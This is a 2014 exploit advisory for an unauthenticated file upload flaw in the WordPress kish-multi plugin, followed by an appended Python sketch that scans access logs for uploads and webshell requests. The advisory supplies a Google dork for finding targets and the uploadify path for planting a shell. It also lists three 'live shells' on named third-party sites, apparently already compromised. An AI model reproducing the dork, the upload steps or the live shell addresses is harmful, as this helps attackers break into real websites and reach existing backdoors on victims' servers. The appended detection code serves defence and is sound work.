
WordPress kish-multi Plugin File Upload Vulnerability

Author: X-Bruno, Published: 25-06-2014
############################################################################

# Title : WordPress kish-multi Plugin File Upload Vulnerability

# Author : X-Bruno

# Date : 24/06/2014

# Facebook : http://www.facebook.com/Inj3ct.Bruno

# Email: brunox338@gmail.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/kish-multi/

# Tested on : Linux



############################################################################

===== > Exploit :


>>> > http://localhost/wordpress/wp-content/plugins/kish-multi/uploadify/


Then Click on "Select Files" & Enjoy



Shell Access ==== > http://localhost/wordpress/wp-content/plugins/kish-multi/uploads/(shell_name.phtml)





Examples : ( Live Shells )

1- http://agrix.es/wp-content/plugins/kish-multi/help.phtml

2- http://www.tropelias.com/wp-content/plugins/kish-multi/help.phtml

3- http://manuelargamasilla.es/wp-content/plugins/kish-multi/help.phtml


#################################################################

# Greeting : Toomy Jone , Syria , Palestine , HunTerS - Team #

#################################################################
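
Detection sketch for the behaviour described above, added here as an example and not part of the original advisory or the plugin's code: it scans web server access logs for successful POSTs to the plugin's uploadify/ path and for script-type files served from the plugin directory. The combined log format, the extension list, and the sample log lines (handler name, file names, IPs) are assumptions constructed for illustration.

```python
import re
# Paths are the ones named in the advisory; the extension list is an assumption.
PLUGIN = "/wp-content/plugins/kish-multi/"
UPLOADER = PLUGIN + "uploadify/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$")
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')  # combined format

def classify(line):
    """Return (ip, time, kind, path) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    path = m["uri"].split("?", 1)[0].lower()
    pos = path.find(PLUGIN)  # tolerates installs under a prefix such as /wordpress/
    if pos < 0:
        return None
    rel, status = path[pos:], int(m["status"])
    # upload_post: successful POST to the uploader; script_hit: script file served with 200
    if rel.startswith(UPLOADER):
        kind = "upload_post" if m["method"] == "POST" and status < 400 else None
    else:
        kind = "script_hit" if SCRIPT_EXT.search(rel) and status == 200 else None
    return (m["ip"], m["ts"], kind, path) if kind else None

def scan(lines):
    """Findings in log order; each records whether that IP uploaded earlier."""
    uploaders, findings = set(), []
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        ip, ts, kind, path = hit
        if kind == "upload_post":
            uploaders.add(ip)
        findings.append({"ip": ip, "time": ts, "kind": kind, "path": path,
                         "same_ip_uploaded": ip in uploaders})
    return findings

# Constructed sample log lines (documentation IP ranges, invented file names).
P = "/wordpress/wp-content/plugins/kish-multi/"
SAMPLE_LOG = [
    f'198.51.100.7 - - [24/Jun/2014:10:01:02 +0000] "GET {P}uploadify/ HTTP/1.1" 200 512 "-" "-"',
    f'198.51.100.7 - - [24/Jun/2014:10:01:40 +0000] "POST {P}uploadify/uploadify.php HTTP/1.1" 200 1 "-" "-"',
    f'198.51.100.7 - - [24/Jun/2014:10:02:05 +0000] "GET {P}uploads/photo.phtml?x=1 HTTP/1.1" 200 90 "-" "-"',
    f'192.0.2.10 - - [24/Jun/2014:10:03:00 +0000] "GET {P}uploads/logo.png HTTP/1.1" 200 4096 "-" "-"',
    f'203.0.113.5 - - [24/Jun/2014:10:04:00 +0000] "GET {P}uploads/photo.phtml HTTP/1.1" 200 90 "-" "-"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Direct requests to the plugin's own .php files also match script_hit, so allow-list known plugin files before alerting on it.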
